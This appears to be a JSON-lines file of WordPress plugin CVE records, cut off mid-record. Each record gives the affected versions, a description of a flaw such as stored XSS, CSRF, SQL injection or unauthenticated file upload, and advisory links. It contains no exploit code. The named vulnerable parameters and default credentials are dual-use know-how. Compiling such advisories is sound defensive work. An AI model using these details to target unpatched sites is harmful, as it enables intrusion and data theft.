{"CVE_ID":"CVE-2025-4587","slug":"ab-testing-for-wp","versionImpact":"1.18.2","description":"The A\/B Testing for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ab-testing-for-wp\/ab-test-block' block in all versions up to, and including, 1.18.2 due to insufficient input sanitization and output escaping on the 'id' parameter. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ab-testing-for-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ab-testing-for-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dcf401a-3b91-4b55-b6b1-a132ec195607?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dcf401a-3b91-4b55-b6b1-a132ec195607?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0731","slug":"interactive-geo-maps","versionImpact":"1.5.9","description":"The Interactive Geo Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the action content parameter in versions up to, and including, 1.5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2861473%40interactive-geo-maps%2Ftrunk&old=2857078%40interactive-geo-maps%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2861473%40interactive-geo-maps%2Ftrunk&old=2857078%40interactive-geo-maps%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ce515a-377c-49b4-8d1b-7ac22769c759\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ce515a-377c-49b4-8d1b-7ac22769c759\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0692","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_payment_status' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about the payment status of arbitrary form submissions.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd85ff2-6607-4ac8-b91c-88f6f2fa6c56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ddd85ff2-6607-4ac8-b91c-88f6f2fa6c56?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2579","slug":"inventorypress","versionImpact":"1.7","description":"The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-inventory-press-plugin\",\"name\":\"https:\\\/\\\/github.com\\\/daniloalbuqrque\\\/poc-cve-xss-inventory-press-plugin\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1425","slug":"embedpress","versionImpact":"3.9.8","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Calendar Widget Link in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4568c8-f58c-4c37-94b9-6154e5c46928?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Calendar.php#L314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/tags\\\/3.9.8\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Calendar.php#L314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0681","slug":"page-and-post-restriction","versionImpact":"1.3.4","description":"The Page Restriction WordPress (WP) \u2013 Protect WP Pages\/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4. This is due to the plugin not properly restricting access to pages via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected pages. The vendor has decided that they will not implement REST API protection on posts and pages and the restrictions will only apply to the front-end of the site. The vendors solution was to add notices throughout the dashboard and recommends installing the WordPress REST API Authentication plugin for REST API coverage.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4474","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71954c60-6a5b-4cac-9920-6d9b787ead9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/71954c60-6a5b-4cac-9920-6d9b787ead9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7655","slug":"peepso-core","versionImpact":"6.4.5.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e85ee611-ae81-4736-b4f0-b9d06714da18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e85ee611-ae81-4736-b4f0-b9d06714da18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/6-4-6-0\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/6-4-6-0\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigfields.php?rev=3147528#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigfields.php?rev=3147528#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9591","slug":"wp-custom-taxonomy-image","versionImpact":"1.0.0","description":"The Category and Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_category_image' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5760933b-30e6-465b-9b94-c913b21f07fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5760933b-30e6-465b-9b94-c913b21f07fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-image\\\/trunk\\\/wp-custom-taxonomy-image.php?rev=1454210#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-image\\\/trunk\\\/wp-custom-taxonomy-image.php?rev=1454210#L47\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9426","slug":"aqua-svg-sprite","versionImpact":"3.0.14","description":"The Aqua SVG Sprite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4c1809-d79f-4505-8f0a-9ec534c8fea2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc4c1809-d79f-4505-8f0a-9ec534c8fea2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aqua-svg-sprite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aqua-svg-sprite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1311","slug":"wcfm-marketplace-rest-api","versionImpact":"1.6.2","description":"The WooCommerce Multivendor Marketplace \u2013 REST API plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in the update_delivery_status() function in all versions up to, and including, 1.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/trunk\\\/includes\\\/api\\\/class-api-deliveries-controller.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wcfm-marketplace-rest-api\\\/trunk\\\/includes\\\/api\\\/class-api-deliveries-controller.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wcfm-marketplace-rest-api\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wcfm-marketplace-rest-api\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ff5cda2-edcd-4fa5-9c8e-427a43802ed1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ff5cda2-edcd-4fa5-9c8e-427a43802ed1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4336","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_file() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable by unauthenticated attackers in default configurations where the the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4336\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-4336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/smconnector.php#L35-36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4336\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-4336\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5323dbb7-3893-4b43-838b-6326505b2fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5323dbb7-3893-4b43-838b-6326505b2fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0730","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4104f69f-b185-498a-aabf-2126ffb94ab3\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4104f69f-b185-498a-aabf-2126ffb94ab3\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0691","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_last_name' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about arbitrary form submissions, specifically the submitter's last name.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fc4b815-dc05-4270-bf7a-3b01622739d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fc4b815-dc05-4270-bf7a-3b01622739d7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2330","slug":"gsheetconnector-caldera-forms","versionImpact":"1.2","description":"The Caldera Forms Google Sheets Connector WordPress plugin through 1.2 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa8ccdd0-7b23-4b12-9aa9-4b29d47256b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa8ccdd0-7b23-4b12-9aa9-4b29d47256b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1411","slug":"powerpack-lite-for-elementor","versionImpact":"2.7.15","description":"The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the settings of the Twitter Buttons Widget in all versions up to, and including, 2.7.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64480862-c076-4ea9-a03b-9aed81f876d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3035790\\\/powerpack-lite-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3035790\\\/powerpack-lite-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0631","slug":"duitku-social-payment-gateway","versionImpact":"2.11.4","description":"The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.4. This makes it possible for unauthenticated attackers to change the payment status of orders to failed.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a33de35f-1c9d-4fc9-9be8-0a1c7d9352ec?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duitku-social-payment-gateway\\\/trunk\\\/woocommerce-gateway-duitku.php#L409\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duitku-social-payment-gateway\\\/trunk\\\/woocommerce-gateway-duitku.php#L409\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4384","slug":"cssable-countdown","versionImpact":"1.5","description":"The CSSable Countdown WordPress plugin through 1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad714196-2590-4dc9-b5b9-50808e9e0d26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad714196-2590-4dc9-b5b9-50808e9e0d26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7416","slug":"reveal-template","versionImpact":"3.7","description":"The Reveal Template plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.7. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34a36da0-a101-4c5a-bacb-9f131bded819?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34a36da0-a101-4c5a-bacb-9f131bded819?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reveal-template\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reveal-template\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7618","slug":"peepso-core","versionImpact":"6.4.5.0","description":"The Community by PeepSo \u2013 Social Network, Membership, Registration, User Profiles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 6.4.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.4.0\\\/templates\\\/reactions\\\/admin_reaction.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.4.0\\\/templates\\\/reactions\\\/admin_reaction.php#L112\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peepso-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.peepso.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147528\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigreactions.php?rev=3147528#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.0\\\/classes\\\/adminconfigreactions.php?rev=3147528#L88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9590","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image meta field value in the 'wpaft_add_meta_textinput' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/wp-texonomy-meta.php?rev=1454207#L631\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/wp-texonomy-meta.php?rev=1454207#L631\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8985","slug":"social-proof-testimonials-slider","versionImpact":"2.2.4","description":"The Social Proof (Testimonial) Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spslider-block shortcode in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 